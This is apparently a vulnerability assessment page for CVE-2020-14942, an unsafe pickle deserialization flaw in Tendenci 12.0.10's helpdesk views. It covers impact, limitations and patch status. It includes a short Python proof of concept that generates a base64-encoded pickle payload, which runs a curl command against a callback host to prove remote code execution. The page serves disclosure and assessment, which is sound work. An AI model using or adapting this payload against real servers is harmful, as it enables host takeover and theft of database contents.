CVE-2020-14942

Tendenci 12.0.10 allows unrestricted deserialization in apps\helpdesk\views\staff.py.

Recent assessments:

kevthehermit at June 21, 2020 7:03pm UTC reported:

Outline

Untrusted data from the client side is used to create a python pickled object. This can lead to full RCE and compromise of the host. There are some limitations and this is not the default configuration.

Impact

If you can control the input it may be possible to gain code execution on the underlying server. With code execution you can gain full access to the database and its data.

Limitations

• The helpdesk module is not enabled by default.

• A valid authenticated account with permissions to access /tickets

Patch

This doesn’t not appear to be patched in the latest release, although it has been acknowledged

POC

It is fairly easy to create a functional POC against this target if the feature is enabled.

Modify the following POC to fit your needs.

import pickle
import base64
import os


class RCE:
    def __reduce__(self):
        cmd = ('curl 172.22.0.1:1234')
        return os.system, (cmd,)


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))

Assessed Attacker Value: 2
Assessed Attacker Value: 2Assessed Attacker Value: 4